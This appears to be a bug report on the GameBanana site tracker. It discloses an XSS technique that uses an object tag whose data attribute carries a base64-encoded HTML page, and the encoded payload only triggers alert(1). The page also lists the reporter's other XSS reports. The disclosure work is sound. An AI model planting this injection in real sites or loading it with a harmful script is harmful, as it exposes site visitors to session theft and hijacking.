Ads keep us online. Without them, we wouldn't exist. We don't have paywalls or sell mods - we never will. But every month we have large bills and running ads is our only way to cover them. Please consider unblocking us. Thank you from GameBanana <3

XSS Using Object Tag with [data] attribute

A Bug


XSS is possible using the object tag data attribute with the base64 encoded URL.

Code:
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">

Request: Can I get the Inline Styles unlocked? I know this sounds unfair to some of you but It would be nice if some of the administrators could do that for me. At least I'm trying to protect this website in any way I can. Thanks!

Comments

Sign up to access this!

No comments yet

Embed

menu
Поділитися баннером
URL зображення
Вставний HTML код
Вставний BB код
Вставний Markdown код

Reporter

theNurky avatar
theNurky Joined 3y ago
I am offline
1,060 points Ranked 24190th
18 medals 2 rare
  • Submitted 20 Maps Medal icon
  • Returned 1000 times Medal icon
  • Submitted 5 Maps Medal icon
  • Returned 100 times Medal icon
  • One month a member Medal icon
  • Submitted 1 Tool Medal icon
theNurky
Sign up to access this!
Sign up to access this!
Sign up to access this!

Details

Resolution
Нове
Priority
Низький
Problem Source
https://gamebanana.com

Share

  • Share on Reddit
  • Share on Twitter
  • Share on Facebook
  • access_time 2mo

More from Submitter

menu
Website Should Implement Image Proxies Вирішено Низький Priority Reflected XSS on Search through mid parameter Confirmed Низький Priority Reflected XSS on Search through game parameter Confirmed Низький Priority Reflected XSS on any members URL Нове Низький Priority
bcp.crwdcntrl.net tracking pixel